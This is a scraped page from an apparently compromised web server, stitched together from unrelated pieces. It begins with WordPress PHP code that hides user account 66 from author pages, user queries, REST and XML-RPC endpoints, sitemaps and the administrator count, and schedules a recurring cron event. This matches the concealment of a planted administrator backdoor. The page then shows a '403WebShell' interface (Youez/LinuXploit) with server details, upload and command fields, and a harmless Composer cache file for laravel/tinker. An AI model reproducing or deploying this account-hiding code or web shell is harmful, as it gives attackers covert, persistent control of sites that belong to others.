add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/provider-laravel~tinker.json
{"minified":"composer/2.0","packages":{"laravel/tinker":[{"name":"laravel/tinker","description":"Powerful REPL for the Laravel framework.","keywords":["laravel","REPL","psysh","Tinker"],"homepage":"","version":"v2.10.0","version_normalized":"2.10.0.0","license":["MIT"],"authors":[{"name":"Taylor Otwell","email":"taylor@laravel.com"}],"source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"ba4d51eb56de7711b3a37d63aa0643e99a339ae5"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/ba4d51eb56de7711b3a37d63aa0643e99a339ae5","type":"zip","shasum":"","reference":"ba4d51eb56de7711b3a37d63aa0643e99a339ae5"},"type":"library","support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.10.0"},"funding":[],"time":"2024-09-23T13:32:56+00:00","autoload":{"psr-4":{"Laravel\\Tinker\\":"src/"}},"extra":{"laravel":{"providers":["Laravel\\Tinker\\TinkerServiceProvider"]}},"require":{"php":"^7.2.5|^8.0","illuminate/console":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","illuminate/contracts":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","illuminate/support":"^6.0|^7.0|^8.0|^9.0|^10.0|^11.0","psy/psysh":"^0.11.1|^0.12.0","symfony/var-dumper":"^4.3.4|^5.0|^6.0|^7.0"},"require-dev":{"mockery/mockery":"~1.3.3|^1.4.2","phpstan/phpstan":"^1.10","phpunit/phpunit":"^8.5.8|^9.3.3"},"suggest":{"illuminate/database":"The Illuminate Database package (^6.0|^7.0|^8.0|^9.0|^10.0|^11.0)."}},{"version":"v2.9.0","version_normalized":"2.9.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"502e0fe3f0415d06d5db1f83a472f0f3b754bafe"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/502e0fe3f0415d06d5db1f83a472f0f3b754bafe","type":"zip","shasum":"","reference":"502e0fe3f0415d06d5db1f83a472f0f3b754bafe"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.9.0"},"time":"2024-01-04T16:10:04+00:00"},{"version":"v2.8.2","version_normalized":"2.8.2.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"b936d415b252b499e8c3b1f795cd4fc20f57e1f3"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/b936d415b252b499e8c3b1f795cd4fc20f57e1f3","type":"zip","shasum":"","reference":"b936d415b252b499e8c3b1f795cd4fc20f57e1f3"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.8.2"},"time":"2023-08-15T14:27:00+00:00","extra":{"branch-alias":{"dev-master":"2.x-dev"},"laravel":{"providers":["Laravel\\Tinker\\TinkerServiceProvider"]}},"require":{"php":"^7.2.5|^8.0","illuminate/console":"^6.0|^7.0|^8.0|^9.0|^10.0","illuminate/contracts":"^6.0|^7.0|^8.0|^9.0|^10.0","illuminate/support":"^6.0|^7.0|^8.0|^9.0|^10.0","psy/psysh":"^0.10.4|^0.11.1","symfony/var-dumper":"^4.3.4|^5.0|^6.0"},"suggest":{"illuminate/database":"The Illuminate Database package (^6.0|^7.0|^8.0|^9.0|^10.0)."}},{"version":"v2.8.1","version_normalized":"2.8.1.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"04a2d3bd0d650c0764f70bf49d1ee39393e4eb10"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/04a2d3bd0d650c0764f70bf49d1ee39393e4eb10","type":"zip","shasum":"","reference":"04a2d3bd0d650c0764f70bf49d1ee39393e4eb10"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.8.1"},"time":"2023-02-15T16:40:09+00:00","require-dev":{"mockery/mockery":"~1.3.3|^1.4.2","phpunit/phpunit":"^8.5.8|^9.3.3"}},{"version":"v2.8.0","version_normalized":"2.8.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"74d0b287cc4ae65d15c368dd697aae71d62a73ad"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/74d0b287cc4ae65d15c368dd697aae71d62a73ad","type":"zip","shasum":"","reference":"74d0b287cc4ae65d15c368dd697aae71d62a73ad"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.8.0"},"time":"2023-01-10T18:03:30+00:00"},{"version":"v2.7.3","version_normalized":"2.7.3.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"5062061b4924af3392225dd482ca7b4d85d8b8ef"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/5062061b4924af3392225dd482ca7b4d85d8b8ef","type":"zip","shasum":"","reference":"5062061b4924af3392225dd482ca7b4d85d8b8ef"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.7.3"},"time":"2022-11-09T15:11:38+00:00","require":{"php":"^7.2.5|^8.0","illuminate/console":"^6.0|^7.0|^8.0|^9.0","illuminate/contracts":"^6.0|^7.0|^8.0|^9.0","illuminate/support":"^6.0|^7.0|^8.0|^9.0","psy/psysh":"^0.10.4|^0.11.1","symfony/var-dumper":"^4.3.4|^5.0|^6.0"},"suggest":{"illuminate/database":"The Illuminate Database package (^6.0|^7.0|^8.0|^9.0)."}},{"version":"v2.7.2","version_normalized":"2.7.2.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"dff39b661e827dae6e092412f976658df82dbac5"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/dff39b661e827dae6e092412f976658df82dbac5","type":"zip","shasum":"","reference":"dff39b661e827dae6e092412f976658df82dbac5"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.7.2"},"time":"2022-03-23T12:38:24+00:00"},{"version":"v2.7.1","version_normalized":"2.7.1.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"1e2d500585a4e546346fadd3adc6f9c1a97e15f4"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/1e2d500585a4e546346fadd3adc6f9c1a97e15f4","type":"zip","shasum":"","reference":"1e2d500585a4e546346fadd3adc6f9c1a97e15f4"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.7.1"},"time":"2022-03-15T15:25:01+00:00"},{"version":"v2.7.0","version_normalized":"2.7.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"5f2f9815b7631b9f586a3de7933c25f9327d4073"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/5f2f9815b7631b9f586a3de7933c25f9327d4073","type":"zip","shasum":"","reference":"5f2f9815b7631b9f586a3de7933c25f9327d4073"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.7.0"},"time":"2022-01-10T08:52:49+00:00"},{"version":"v2.6.3","version_normalized":"2.6.3.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"a9ddee4761ec8453c584e393b393caff189a3e42"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/a9ddee4761ec8453c584e393b393caff189a3e42","type":"zip","shasum":"","reference":"a9ddee4761ec8453c584e393b393caff189a3e42"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.6.3"},"time":"2021-12-07T16:41:42+00:00","require":{"php":"^7.2.5|^8.0","illuminate/console":"^6.0|^7.0|^8.0","illuminate/contracts":"^6.0|^7.0|^8.0","illuminate/support":"^6.0|^7.0|^8.0","psy/psysh":"^0.10.4","symfony/var-dumper":"^4.3.4|^5.0"},"suggest":{"illuminate/database":"The Illuminate Database package (^6.0|^7.0|^8.0)."}},{"version":"v2.6.2","version_normalized":"2.6.2.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"c808a7227f97ecfd9219fbf913bad842ea854ddc"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/c808a7227f97ecfd9219fbf913bad842ea854ddc","type":"zip","shasum":"","reference":"c808a7227f97ecfd9219fbf913bad842ea854ddc"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.6.2"},"time":"2021-09-28T15:47:34+00:00"},{"version":"v2.6.1","version_normalized":"2.6.1.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"04ad32c1a3328081097a181875733fa51f402083"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/04ad32c1a3328081097a181875733fa51f402083","type":"zip","shasum":"","reference":"04ad32c1a3328081097a181875733fa51f402083"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.6.1"},"time":"2021-03-02T16:53:12+00:00"},{"version":"v2.6.0","version_normalized":"2.6.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"daae1c43f1300fe88c05d83db6f3d8f76677ad88"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/daae1c43f1300fe88c05d83db6f3d8f76677ad88","type":"zip","shasum":"","reference":"daae1c43f1300fe88c05d83db6f3d8f76677ad88"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.6.0"},"time":"2021-01-26T20:35:18+00:00"},{"version":"v2.5.0","version_normalized":"2.5.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"45884b526e10a88a1b179fa1a1a24d5468c668c2"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/45884b526e10a88a1b179fa1a1a24d5468c668c2","type":"zip","shasum":"","reference":"45884b526e10a88a1b179fa1a1a24d5468c668c2"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.5.0"},"time":"2020-10-29T13:07:12+00:00"},{"version":"v2.4.2","version_normalized":"2.4.2.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"58424c24e8aec31c3a3ac54eb3adb15e8a0a067b"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/58424c24e8aec31c3a3ac54eb3adb15e8a0a067b","type":"zip","shasum":"","reference":"58424c24e8aec31c3a3ac54eb3adb15e8a0a067b"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/2.x"},"time":"2020-08-11T19:28:08+00:00","require":{"php":"^7.2","illuminate/console":"^6.0|^7.0|^8.0","illuminate/contracts":"^6.0|^7.0|^8.0","illuminate/support":"^6.0|^7.0|^8.0","psy/psysh":"^0.10.3","symfony/var-dumper":"^4.3|^5.0"},"require-dev":{"mockery/mockery":"^1.3.1","phpunit/phpunit":"^8.4|^9.0"}},{"version":"v2.4.1","version_normalized":"2.4.1.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"3c9ef136ca59366bc1b50b7f2500a946d5149c62"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/3c9ef136ca59366bc1b50b7f2500a946d5149c62","type":"zip","shasum":"","reference":"3c9ef136ca59366bc1b50b7f2500a946d5149c62"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.4.1"},"time":"2020-07-07T15:10:00+00:00"},{"version":"v2.4.0","version_normalized":"2.4.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"cde90a7335a2130a4488beb68f4b2141869241db"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/cde90a7335a2130a4488beb68f4b2141869241db","type":"zip","shasum":"","reference":"cde90a7335a2130a4488beb68f4b2141869241db"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.4.0"},"time":"2020-04-07T15:01:31+00:00"},{"version":"v2.3.0","version_normalized":"2.3.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"5271893ec90ad9f8d3e34792ac6b72cad3b84cc2"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/5271893ec90ad9f8d3e34792ac6b72cad3b84cc2","type":"zip","shasum":"","reference":"5271893ec90ad9f8d3e34792ac6b72cad3b84cc2"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.3.0"},"time":"2020-03-17T15:34:59+00:00","require":{"php":"^7.2","illuminate/console":"^6.0|^7.0|^8.0","illuminate/contracts":"^6.0|^7.0|^8.0","illuminate/support":"^6.0|^7.0|^8.0","psy/psysh":"^0.9|^0.10","symfony/var-dumper":"^4.0|^5.0"},"require-dev":{"mockery/mockery":"^1.3.1","phpunit/phpunit":"^8.0|^9.0"}},{"version":"v2.2.0","version_normalized":"2.2.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"37579c93271ec30ef099dd633ec7c2de5e5fb112"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/37579c93271ec30ef099dd633ec7c2de5e5fb112","type":"zip","shasum":"","reference":"37579c93271ec30ef099dd633ec7c2de5e5fb112"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v2.2.0"},"time":"2020-02-05T15:00:44+00:00","require":{"php":"^7.2","illuminate/console":"^6.0|^7.0","illuminate/contracts":"^6.0|^7.0","illuminate/support":"^6.0|^7.0","psy/psysh":"^0.9","symfony/var-dumper":"^4.0|^5.0"},"suggest":{"illuminate/database":"The Illuminate Database package (^6.0|^7.0)."},"funding":"__unset"},{"version":"v2.1.0","version_normalized":"2.1.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"d8ce361f2fd979c03e5f66c79d4a95a1c1e68640"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/d8ce361f2fd979c03e5f66c79d4a95a1c1e68640","type":"zip","shasum":"","reference":"d8ce361f2fd979c03e5f66c79d4a95a1c1e68640"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/2.x"},"time":"2020-01-14T16:58:39+00:00","require-dev":{"phpunit/phpunit":"^8.0"}},{"version":"v2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"6c2f1a1873180f3ecece0ba34ff9146847bf8dec"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/6c2f1a1873180f3ecece0ba34ff9146847bf8dec","type":"zip","shasum":"","reference":"6c2f1a1873180f3ecece0ba34ff9146847bf8dec"},"time":"2019-11-26T17:57:28+00:00"},{"version":"v1.0.10","version_normalized":"1.0.10.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"ad571aacbac1539c30d480908f9d0c9614eaf1a7"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/ad571aacbac1539c30d480908f9d0c9614eaf1a7","type":"zip","shasum":"","reference":"ad571aacbac1539c30d480908f9d0c9614eaf1a7"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v1.0.10"},"time":"2019-08-07T15:10:45+00:00","extra":{"branch-alias":{"dev-master":"1.0-dev"},"laravel":{"providers":["Laravel\\Tinker\\TinkerServiceProvider"]}},"require":{"php":">=5.5.9","illuminate/console":"~5.1|^6.0","illuminate/contracts":"~5.1|^6.0","illuminate/support":"~5.1|^6.0","psy/psysh":"0.7.*|0.8.*|0.9.*","symfony/var-dumper":"~3.0|~4.0"},"require-dev":{"phpunit/phpunit":"~4.0|~5.0"},"suggest":{"illuminate/database":"The Illuminate Database package (~5.1)."}},{"version":"v1.0.9","version_normalized":"1.0.9.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"eb0075527fdeeb1cc1d68bd4ca7d50256b30a827"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/eb0075527fdeeb1cc1d68bd4ca7d50256b30a827","type":"zip","shasum":"","reference":"eb0075527fdeeb1cc1d68bd4ca7d50256b30a827"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/master"},"time":"2019-07-29T18:09:25+00:00"},{"version":"v1.0.8","version_normalized":"1.0.8.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"cafbf598a90acde68985660e79b2b03c5609a405"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/cafbf598a90acde68985660e79b2b03c5609a405","type":"zip","shasum":"","reference":"cafbf598a90acde68985660e79b2b03c5609a405"},"time":"2018-10-12T19:39:35+00:00","require":{"php":">=5.5.9","illuminate/console":"~5.1","illuminate/contracts":"~5.1","illuminate/support":"~5.1","psy/psysh":"0.7.*|0.8.*|0.9.*","symfony/var-dumper":"~3.0|~4.0"}},{"version":"v1.0.7","version_normalized":"1.0.7.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"e3086ee8cb1f54a39ae8dcb72d1c37d10128997d"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/e3086ee8cb1f54a39ae8dcb72d1c37d10128997d","type":"zip","shasum":"","reference":"e3086ee8cb1f54a39ae8dcb72d1c37d10128997d"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/v1.0.7"},"time":"2018-05-17T13:42:07+00:00"},{"version":"v1.0.6","version_normalized":"1.0.6.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"b22fe905fcefdffae76b011e27c7ac09e07e052b"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/b22fe905fcefdffae76b011e27c7ac09e07e052b","type":"zip","shasum":"","reference":"b22fe905fcefdffae76b011e27c7ac09e07e052b"},"support":{"issues":"https://github.com/laravel/tinker/issues","source":"https://github.com/laravel/tinker/tree/master"},"time":"2018-04-16T12:10:37+00:00"},{"version":"v1.0.5","version_normalized":"1.0.5.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"94f6daf2131508cebd11cd6f8632ba586d7ecc41"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/94f6daf2131508cebd11cd6f8632ba586d7ecc41","type":"zip","shasum":"","reference":"94f6daf2131508cebd11cd6f8632ba586d7ecc41"},"time":"2018-03-06T17:34:36+00:00","require":{"php":">=5.5.9","illuminate/console":"~5.1","illuminate/contracts":"~5.1","illuminate/support":"~5.1","psy/psysh":"0.7.*|0.8.*","symfony/var-dumper":"~3.0|~4.0"}},{"version":"v1.0.4","version_normalized":"1.0.4.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"eb8d3cfb41b7f74fb0ef4724e459d44f4cbb35b8"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/eb8d3cfb41b7f74fb0ef4724e459d44f4cbb35b8","type":"zip","shasum":"","reference":"eb8d3cfb41b7f74fb0ef4724e459d44f4cbb35b8"},"time":"2018-03-06T13:48:07+00:00"},{"version":"v1.0.3","version_normalized":"1.0.3.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"852c2abe0b0991555a403f1c0583e64de6acb4a6"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/852c2abe0b0991555a403f1c0583e64de6acb4a6","type":"zip","shasum":"","reference":"852c2abe0b0991555a403f1c0583e64de6acb4a6"},"time":"2017-12-18T16:25:11+00:00"},{"version":"v1.0.2","version_normalized":"1.0.2.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"203978fd67f118902acff95925847e70b72e3daf"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/203978fd67f118902acff95925847e70b72e3daf","type":"zip","shasum":"","reference":"203978fd67f118902acff95925847e70b72e3daf"},"time":"2017-07-13T13:11:05+00:00","require":{"php":">=5.5.9","illuminate/console":"~5.1","illuminate/contracts":"~5.1","illuminate/support":"~5.1","psy/psysh":"0.7.*|0.8.*","symfony/var-dumper":"~3.0"}},{"version":"v1.0.1","version_normalized":"1.0.1.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"7eb2e281395131897407285672ef5532e87e17f9"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/7eb2e281395131897407285672ef5532e87e17f9","type":"zip","shasum":"","reference":"7eb2e281395131897407285672ef5532e87e17f9"},"time":"2017-06-01T16:31:26+00:00"},{"version":"v1.0.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/laravel/tinker.git","type":"git","reference":"3d5b675b55b24ccbf86395964042dbe061d5a965"},"dist":{"url":"https://api.github.com/repos/laravel/tinker/zipball/3d5b675b55b24ccbf86395964042dbe061d5a965","type":"zip","shasum":"","reference":"3d5b675b55b24ccbf86395964042dbe061d5a965"},"time":"2016-12-30T18:13:17+00:00","extra":{"branch-alias":{"dev-master":"1.0-dev"}}}]},"security-advisories":[],"last-modified":"Tue, 24 Sep 2024 15:53:26 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit